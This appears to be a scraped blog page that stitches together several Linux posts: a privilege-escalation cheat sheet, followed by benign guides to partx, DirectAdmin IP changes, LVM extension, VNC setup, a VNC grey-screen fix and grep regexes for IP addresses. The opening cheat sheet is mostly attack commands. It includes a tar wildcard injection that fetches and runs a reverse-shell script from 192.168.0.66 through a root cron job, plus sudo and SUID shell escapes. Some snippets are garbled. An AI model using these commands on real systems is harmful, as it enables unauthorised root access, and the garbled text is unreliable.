Linux Privilege Escalation Methods

1. Kernel Exploits
1.1 Dirty Cow Exploit: https://dirtycow.ninja/

2. Exploiting Weak Services

3.1 Wildcard Injection

Crontab :0 5 * * * root tar -zcf /var/backups/home.tgz /home/*==>. [user@localhost home]$ wget http://192.168.0.66/rshell.sh. [user@localhost home]$ touch “–checkpoint-action=exec=sh rshell.sh”. [user@localhost home]$ touch “–checkpoint=1”. <Open a listener on attack platform, wait for cronjob to execute rshell.sh.>

3.3 The Infamous SUID Executable

find directory –user root –perm –4000 –exec ls –ld {} \; >/tmp/setuid
[user@localhost home]$ nmap –interactivenmap> !sh# whoamiroot

3.4 Exploiting SUDO Users

sudo find /etc -exec sh -i \;

[user@localhost]$ sudo:shell[root@localhost]#

[user@localhost]$ sudo less file.txt!bash[root@localhost]#

[user@localhost]$ sudo more long_file.txt!bash[root@localhost]#

[user@localhost]$ sudo python -c 'import pty; pty.spawn("/bin/sh")[user@localhost]$ sudo perl -e 'exec "/bin/sh";'[user@localhost]$ sudo ruby -e 'exec "/bin/sh"'

sudo zip /tmp/exploit.zip /tmp/exploit -T --unzip-command="sh -c /bin/bash"

sudo tar cf /dev/null /tmp/exploit --checkpoint=1 --checkpoint-action=exec=/bin/bash

4. Physical Access Attacks

4.1 LUKS Vulnerability – Enter Key to Root in 70 Seconds

Read More

How to use a new partition in RHEL6 without reboot?

Environment

• Red Hat Enterprise Linux 6

Issue

• Added a new partition to a disk that have some existing partitions already mounted. Can the new partition be used without reboot in RHEL6?
• New partition created with fdisk command is not visible in the OS.

Resolution

partprobe was commonly used in RHEL 5 to inform the OS of partition table changes on the disk. In RHEL 6, it will only trigger the OS to update the partitions on a disk that none of its partitions are in use (e.g. mounted). If any partition on a disk is in use, partprobe will not trigger the OS to update partitions in the system because it is considered unsafe in some situations.

So in general we would suggest:

1. Unmount all the partitions of the disk before modifying the partition table on the disk, and then run partprobe to update the partitions in system.
2. If this is not possible (e.g. the mounted partition is a system partition), reboot the system after modifying the partition table. The partitions information will be re-read after reboot.

If a new partition was added and none of the existing partitions were modified, consider using the partx command to update the system partition table. Do note that the partx command does not do much checking between the new and the existing partition table in the system and assumes the user knows what they are are doing. So it can corrupt the data on disk if the existing partitions are modified or the partition table is not set correctly. So use at one's own risk.

For example, a partition #1 is an existing partition and a new partition #2 is already added in /dev/sdb by fdisk. Here we use partx -v -a /dev/sdb to add the new partition to the system:

Raw

# ls /dev/sdb*  
/dev/sdb  /dev/sdb1  

List the partition table of disk:

Raw

# partx -l /dev/sdb
# 1:        63-   505007 (   504945 sectors,    258 MB)  
# 2:    505008-  1010015 (   505008 sectors,    258 MB)  
# 3:         0-       -1 (        0 sectors,      0 MB)  
# 4:         0-       -1 (        0 sectors,      0 MB)  

Read disk and try to add all partitions to the system:

Raw

# partx -v -a /dev/sdb                                         
device /dev/sdb: start 0 size 2097152  
gpt: 0 slices  
dos: 4 slices  
# 1:        63-   505007 (   504945 sectors,    258 MB)  
# 2:    505008-  1010015 (   505008 sectors,    258 MB)  
# 3:         0-       -1 (        0 sectors,      0 MB)  
# 4:         0-       -1 (        0 sectors,      0 MB)  
BLKPG: Device or resource busy
error adding partition 1

(These last 2 lines are normal in this case because partition 1 is already added in the system before partition 2 is added)

Check that we have device nodes for /dev/sdb itself and the partitions on it:

Raw

# ls /dev/sdb*  
/dev/sdb  /dev/sdb1  /dev/sdb2

Read More

How to change your server IP address in DirectAdmin

To change the IP address for DirectAdmin and DNS server you need to follow next steps:
Connect to your VPS server using SSH (e.g. PuTTY)
Go to /usr/local/directadmin/scripts directory:
# cd /usr/local/directadmin/scripts
Start ipswap.sh script to change old IP address for your Control Panel and DNS server to the new one (e.g. # ./ipswap.sh 8.8.8.8 7.7.7.7):
# ./ipswap.sh old_ip new_ip
Restart all services for the changes to take effect:
# /etc/init.d/httpd restart
# /etc/init.d/proftpd restart
# /etc/init.d/exim restart
# /etc/init.d/dovecot restart

Read More

Extending a logical volume in a virtual machine running Red Hat or Cent OS

- Power off the virtual machine.
- Edit the virtual machine settings and extend the virtual disk size. For more information, see Increasing the size of a virtual disk (1004047).
- Power on the virtual machine.
- Identify the device name, which is by default /dev/sda, and confirm the new size by running the command:

# fdisk -l

- Create a new primary partition:
Run the command:

# fdisk /dev/sda (depending the results of the step 4)
Press p to print the partition table to identify the number of partitions. By default, there are 2: sda1 and sda2.
Press n to create a new primary partition.
Press p for primary.
Press 3 for the partition number, depending on the output of the partition table print.
Press Enter two times.
Press t to change the system's partition ID.
Press 3 to select the newly creation partition.
Type 8e to change the Hex Code of the partition for Linux LVM.
Press w to write the changes to the partition table.

- Restart the virtual machine.
- Run this command to verify that the changes were saved to the partition table and that the new partition has an 8e type:

# fdisk -l

- Run this command to convert the new partition to a physical volume:

Note: The number for the sda can change depending on system setup. Use the sda number that was created in step 5.

# pvcreate /dev/sda3

- Run this command to extend the physical volume:

# vgextend VolGroup00 /dev/sda3

Note: To determine which volume group to extend, use the command vgdisplay.

- Run this command to verify how many physical extents are available to the Volume Group:

# vgdisplay VolGroup00 | grep "Free"

- Run the following command to extend the Logical Volume:

# lvextend -L+#G /dev/VolGroup00/LogVol00

Where # is the number of Free space in GB available as per the previous command. Use the full number output from Step 10 including any decimals.

Note: To determine which logical volume to extend, use the command lvdisplay.

- Run the following command to expand the ext3 filesystem online, inside of the Logical Volume:

# ext2online /dev/VolGroup00/LogVol00

- Notes:
Use resize2fs instead of ext2online if it is not a Red Hat virtual machine.
By default, Red Hat and CentOS 7 use the XFS file system you can grow the file system by running the xfs_growfs command.

Run the following command to verify that the / filesystem has the new space available:

# df -h /
- Related Information

Note: If the extended vmdk does not reflect the new size under Linux guest OS, rescan SCSI device using the following command:

echo 1 > /sys/block/$DEVICE/device/rescan where $DEVICE is 'sda'

For example:

echo 1 > /sys/block/sda/device/rescan

Read More

Install VNC on Ubuntu 16.04

Virtual network computing, or VNC, is a graphical desktop sharing system that allows you to control one computer remotely from another. A VNC server transfers keyboard and mouse events, and displays the remote host’s screen via a network connection, which allows you to operate a full desktop environment on your Linode.

This guide explains how to install a graphic desktop environment on your Linode running Ubuntu 16.04 and how to connect to it from your local computer using VNC.

Before You Begin

1. Familiarize yourself with our Getting Started guide and complete the steps for setting your Linode’s hostname and timezone.
2. Complete the sections of our Securing Your Server guide to create a standard user account, harden SSH access and remove unnecessary network services.
3. Update your system.

   1	sudo apt-get update && sudo apt-get upgrade

This guide is written for a non-root user. Commands that require elevated privileges are prefixed with sudo. If you’re not familiar with the sudo command, you can check our Users and Groups guide.

Install a Desktop and VNC Server on your Linode

1. Ubuntu has several desktop environments available in its repositories. The following command installs the default desktop, Unity, as well as several packages that are required for the graphical interface to work properly:

   1	sudo apt-get install ubuntu-desktop gnome-panel gnome-settings-daemon metacity nautilus gnome-terminal

   This will install the full Ubuntu desktop environment, including office and web browsing tools. To install the desktop without these packages, run:

   1	sudo apt-get install --no-install-recommends ubuntu-desktop gnome-panel gnome-settings-daemon metacity nautilus gnome-terminal

   During the install process, you will be asked whether or not to change a system file to the new version:

   1 2 3 4 5 6 7 8 9 10

   Configuration file '/etc/init/tty1.conf' ==> File on system created by you or by a script. ==> File also in package provided by package maintainer. What would you like to do about it ? Your options are: Y or I : install the package maintainer's version N or O : keep your currently-installed version D : show the differences between the versions Z : start a shell to examine the situation The default action is to keep your current version. *** tty1.conf (Y/I/N/O/D/Z) [default=N] ?

   Type y then enter to use the updated version.
2. Install the VNC server:

   1	sudo apt-get install vnc4server

Secure your VNC connection

The VNC server generates a display, or graphical output, identified by a number that is defined when the server starts. If no display number is defined, the server will use the lowest one available. VNC connections take place on port 5900 + display. In this section we’ll use a display number of 1; therefore, we’ll connect to remote port 5901.

The default VNC connection is unencrypted. In order to secure your passwords and data, you will need to tunnel the traffic through an SSH connection to a local port. We’ll use the same local port for consistency.

Mac OS X and Linux

1. From your desktop, connect to your Linode with the following command. Be sure to replace user@example.com with your username and your Linode’s hostname or IP address:

   1	ssh -L 5901:127.0.0.1:5901 user@example.com

2. From your Linode, launch the VNC server to test your connection. You will be prompted to set a password:

   1	vncserver :1

3. Initiate your connection as per the steps in the Connect to VNC from your Desktop section.

Windows

1. Open PuTTY and navigate to Tunnels under the SSH section in the menu. Add a new forwarded port as shown below, replacing example.com with your Linode’s IP address or hostname:
   
2. Click Add, then return to the ‘Session’ screen. Enter your Linode’s hostname or IP address and a title for your session. Click save to save your settings for future use, and then click open to initiate your SSH tunnel.
3. Launch the VNC server to test your connection. You will be prompted to set a password:

   1	vncserver :1

4. Initiate your connection as per the steps in the Connect to VNC from your Desktop section.

Connect to VNC from your Desktop

In this section, we’ll use a VNC client, or viewer, to connect to our server. A viewer is the software that draws the graphical display generated by the server and creates the output on your local computer.

Mac OS X and Windows

While there are many options for OS X and Windows, this guide will use RealVNC Viewer.

1. After installing and opening the viewer, connect to the localhost through your VNC client. The format is localhost:#, where # is the display number we used in the Secure your VNC connection section:
   
2. You will be warned that the connection is unencrypted, but if you have followed the steps above for securing your VNC connection, your session will be securely tunneled to your Linode. To proceed, press Continue.
   
3. You will be prompted to enter the password you specified in Step 4 of the previous section.
   

After connecting, you will see a blank gray screen since the desktop processes have not yet been started. In the next section we will configure your Linode to launch a full desktop.

Linux

There are a variety of VNC clients available for Ubuntu desktops. You can find the list here. For this guide, we’ll be using Remmina, which is installed by default.

1. Open Remmina.
   
2. Click the button to Create a new remote desktop profile. Name your profile, specify the VNC protocol, and enter localhost:1 in the server field. The :1 in the server field corresponds to the display number. In the password section fill in the password you specified in Step 4 of the previous section:
   
3. Press Connect.

You’ll see a blank gray screen since the desktop processes have not yet started. In the next section, we will configure your Linode to launch a full desktop.

Configure VNC for a Full Desktop

In the next few steps, we’ll configure VNC to launch the full Unity desktop when it starts.

1. Once you’ve successfully connected, exit the connection. Close the VNC server:

   1	vncserver -kill :1

2. Edit the end of your ~/.vnc/xstartup file to match the following configuration. This starts the desktop dependencies as background processes upon starting the VNC server:

   ~/.vnc/xstartup

   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

   #!/bin/sh # Uncomment the following two lines for normal desktop: # unset SESSION_MANAGER # exec /etc/X11/xinit/xinitrc [ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup [ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources xsetroot -solid grey vncconfig -iconic & x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" & x-window-manager & gnome-panel & gnome-settings-daemon & metacity & nautilus &

3. Save and exit the file. Begin another VNC session:

   1	vncserver :1

4. Connect from your local VNC client using the same steps from the previous section. You should now see the full Ubuntu Desktop:
   

Starting VNC Server on Boot

Below we’ve outlined optional steps to ensure that the VNC server starts automatically after reboot.

1. Open your crontab. If you’ve never edited it before, you may be prompted to choose a text editor:

   1 2 3 4 5 6 7 8 9 10

   crontab -e no crontab for user - using an empty one Select an editor. To change later, run 'select-editor'. 1. /bin/ed 2. /bin/nano <---- easiest 3. /usr/bin/vim.basic 4. /usr/bin/vim.tiny Choose 1-4 [2]:

2. Add @reboot /usr/bin/vncserver :1 to the bottom of the file. Your crontab should look like this:

   crontab

   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

   # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hour (h), day of month (dom), month (mon), # and day of week (dow) or use '*' in these fields (for 'any'). # # Notice that tasks will be started based on the cron's system # daemon's notion of time and timezones. # # Output of the crontab jobs (including errors) is sent through # email to the user the crontab file belongs to (unless redirected). # # For example, you can run a backup of all your user accounts # at 5 a.m every week with: # 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/ # # For more information see the manual pages of crontab(5) and cron(8) # # m h dom mon dow command @reboot /usr/bin/vncserver :1

3. Save and exit the file. You can test by rebooting your Linode and attempting to connect to the VNC server.

More Information

You may wish to consult the following resources for additional information on this topic. While these are provided in the hope that they will be useful, please note that we cannot vouch for the accuracy or timeliness of externally hosted materials.

• VNC on Wikipedia
• RealVNC

Read More

Ubuntu VNC Grey Screen

Seeing a grey screen like this? It seems to be a common problem when setting up Ubuntu 14.04 with VNC.

ubuntu-grey-screen-vnc

When trying to setup your Ubuntu machine, a common problem seems to come up: the grey screen. There is no login box, no options no nothing. It seems like you followed all the right steps, and you’re logged in to the server but there is nothing there. It’s confusing. We’ve setup this little tutorial to help you figure out where you went wrong and how to fix it!

The problem for me at least, seemed to be that while I was running vncserver, I didn’t have a desktop running so there was really nothing to look at.

I edited this file:

~/.vnc/xstartup

The following code:

#!/bin/sh
def
export XKL_XMODMAP_DISABLE=1
unset SESSION_MANAGER
unset DBUS_SESSION_BUS_ADDRESS

gnome-panel &
gnome-settings-daemon &
metacity &
nautilus &
gnome-terminal &

That’s it! You may need a restart and everything should be working.

If you have having trouble still, try the following resouces:

Ask Ubuntu:
http://askubuntu.com/questions/452497/14-04-vnc-xstartup-file

LazyGeek blog:
http://rbgeek.wordpress.com/2012/06/25/how-to-install-vnc-server-on-ubuntu-server-12-04/

Broderick tech:
http://broderick-tech.com/vncxstartup-files-ubuntu-14-04/

Read More

RegEx: Find IP Addresses in a File Using Grep

Here are some regular expressions that will help you to perform a validation and to extract all matched IP addresses from a file.

The following regular expressions match IPv4 addresses.

Matched IP addresses can be extracted from a file using grep command.

In this article you’ll find a regular expressions themselves and an example of how to extract matched IP addresses from a file with the grep command.

Regular Expression to Match IP Addresses

Use the following regular expression to match IPv4 addresses (actually it matches all expressions from 0.0.0.0 to 999.999.999.999).

"([0-9]{1,3}[\.]){3}[0-9]{1,3}"

Grep IP Addresses

Parse a file and print all expressions that match a range between 0.0.0.0 and 999.999.999.999.

$ grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" file.txt

This regular expression is quite simple but you should understand that not all matches are technically valid IP addresses.

Let’s find only valid IP addresses with the second regular expression.

Match only Valid IPv4 Addresses

Use the following regular expression to find and validate the IPv4 addresses:

"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"

Grep Only Valid IP Addresses

Find and extract only valid IP addresses from a file:

$ grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt

Option	Description
-E, –extended-regexp	Use extended regular expression
-o, –only-matching	Print IP addresses only

Omit -o option to print lines that contains IP addresses.

Read More